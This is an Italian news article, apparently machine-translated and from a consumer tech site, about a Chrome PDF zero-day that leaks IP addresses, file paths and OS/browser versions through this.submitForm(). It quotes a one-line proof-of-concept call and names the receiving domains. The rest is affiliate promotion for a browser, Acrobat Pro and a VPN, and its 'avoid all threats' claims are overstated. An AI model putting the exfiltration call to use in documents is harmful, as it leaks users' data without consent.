Friendoffriends
Il servizio di rilevamento exploit EdgeSpot ha scoperto un'intrigante vulnerabilità zero-day di Chrome che sfrutta i documenti PDF.
La vulnerabilità consente agli aggressori di raccogliere dati sensibili utilizzando documenti PDF dannosi aperti in Chrome.
Non appena la vittima apre i rispettivi file PDF in Google Chrome, un programma dannoso inizia a funzionare in background raccogliendo i dati dell'utente.
I dati vengono quindi inoltrati al server remoto controllato dagli hacker. Potresti chiederti quali dati vengono risucchiati dagli aggressori, prendono di mira i seguenti dati sul tuo PC:
- indirizzo IP
- Percorso completo del file PDF sul sistema
- Versioni del sistema operativo e di Chrome
Fai attenzione ai file PDF infestati da malware
Gli esperti hanno individuato quello uno dei due domini readnotify [.] com o burpcollaborator [.] net stava ricevendo i dati.
Hanno rivelato che gli aggressori stanno usando il file this.submitForm () API PDF Javascript per raccogliere le informazioni sensibili degli utenti.
Lo abbiamo testato con un PoC minimo, una semplice chiamata API come this.submitForm ("http://google.com/test") farà in modo che Google Chrome invii i dati personali a google.com.
Questo bug di Chrome veniva sfruttato da due serie distinte di file PDF dannosi, entrambi diffusi rispettivamente nell'ottobre 2017 e nel settembre 2018.
In particolare, i dati raccolti possono essere utilizzati dagli aggressori per mettere a punto gli attacchi in futuro. I rapporti suggeriscono che il primo batch di file è stato compilato utilizzando il servizio di tracciamento PDF di ReadNotify.
Gli utenti possono utilizzare il servizio per tenere traccia delle visualizzazioni degli utenti. EdgeSpot non ha condiviso alcun dettaglio sulla natura del secondo set di file PDF.
Suggerimento rapido: cambia il tuo browser in Opera
In questi tempi difficili, siamo attaccati da malware, phishing e trojan ad ogni passo, quindi dobbiamo essere molto più vigili e rimanere protetti.
E poiché questo è un problema specifico di Chrome, puoi evitare quella minaccia e tutte le altre con un browser orientato alla sicurezza come Opera.
Questo browser è dotato di un blocco degli annunci integrato che non solo elimina tali distrazioni, ma blocca anche gli script di analisi, i pixel di tracciamento e i metodi per raccogliere i dati.
E se vuoi essere assolutamente sicuro di stare lontano da qualsiasi pericolo, assicurati il servizio VPN integrato che è gratuito al 100% per un tempo illimitato.
musica lirica
Opera offre la protezione perfetta dalle minacce con l'ad-blocker integrato e il servizio VPN gratuitamente! Ottienilo gratis Visita il sito webCome posso rimanere protetto dalle vulnerabilità dei PDF?
Scarica Adobe Acrobat PRO
Adobe e Chrome sono una buona combinazione quando si tratta di gestire i file PDF. Installando l'estensione Adobe per Chrome, puoi rivedere e manipolare i PDF a tuo piacimento senza lasciare il tuo browser preferito.
Nonostante la sua robusta struttura, il malware nascosto nei file PDF potrebbe non essere rilevato se stai utilizzando la versione standard del Reader.
La versione professionale è consigliata per garantire la tua protezione e tenere i tuoi dati lontani dagli hacker.
Sebbene non sia gratuito, il prezzo che pagherai è piuttosto basso per la pletora di funzionalità aggiuntive che ti piaceranno, inclusa la maggiore sicurezza dei tuoi file PDF.
È inclusa anche una prova gratuita di 7 giorni in modo da poter avere un assaggio dell'esperienza Pro completa prima di effettuare l'acquisto.
Adobe Acrobat PRO
Stai lontano dal malware scaricando Adobe Acrobat PRO. Ha molte più funzionalità rispetto alla versione gratuita e mantiene i tuoi dati al sicuro. Prova gratuita Visita il sito web Ulteriori informazioniNel caso in cui desideri essere sicuro mentre navighi in Internet, dovrai procurarti uno strumento completamente dedicato per proteggere la tua rete. Installa Private Internet Access ora e mettiti al sicuro. Protegge il tuo PC dagli attacchi durante la navigazione, maschera il tuo indirizzo IP e blocca tutti gli accessi indesiderati.
Il servizio di rilevamento degli exploit EdgeSpot voleva avvisare gli utenti di Chrome dei potenziali rischi perché la patch non sarebbe stata rilasciata nel prossimo futuro.
EdgeSpot ha riferito a Google della vulnerabilità lo scorso anno e la società ha promesso di rilasciare una patch alla fine di aprile.
Tuttavia, puoi considerare l'utilizzo di una soluzione temporanea al problema visualizzando localmente i documenti PDF ricevuti utilizzando un'altra app di lettura.
In alternativa, puoi anche aprire i tuoi documenti PDF in Chrome disconnettendo i tuoi sistemi da Internet.
Domande frequenti: ulteriori informazioni sulle estensioni di Chrome
- Privacy Badger funziona con Chrome?
Sì, lo fa. Ma se desideri una selezione più ampia, esplora le nostre migliori scelte per le estensioni della privacy di Chrome in questa guida completa.
- Puoi modificare i PDF in Chrome?
Esistono molte estensioni che consentono l'elaborazione dei PDF. Dai un'occhiata alla nostra eccellente guida sulle migliori estensioni PDF per Chrome.
- Google ha un generatore di codici QR?
Non lo fa ma puoi attivarlo rapidamente. Ecco la nostra guida completa su come abilitare il generatore di codici QR in Chrome.
Nota dell'editore: Questo post è stato originariamente pubblicato nell'aprile 2020 e da allora è stato rinnovato e aggiornato nell'agosto 2020 per freschezza, accuratezza e completezza.
- Cybersecurity
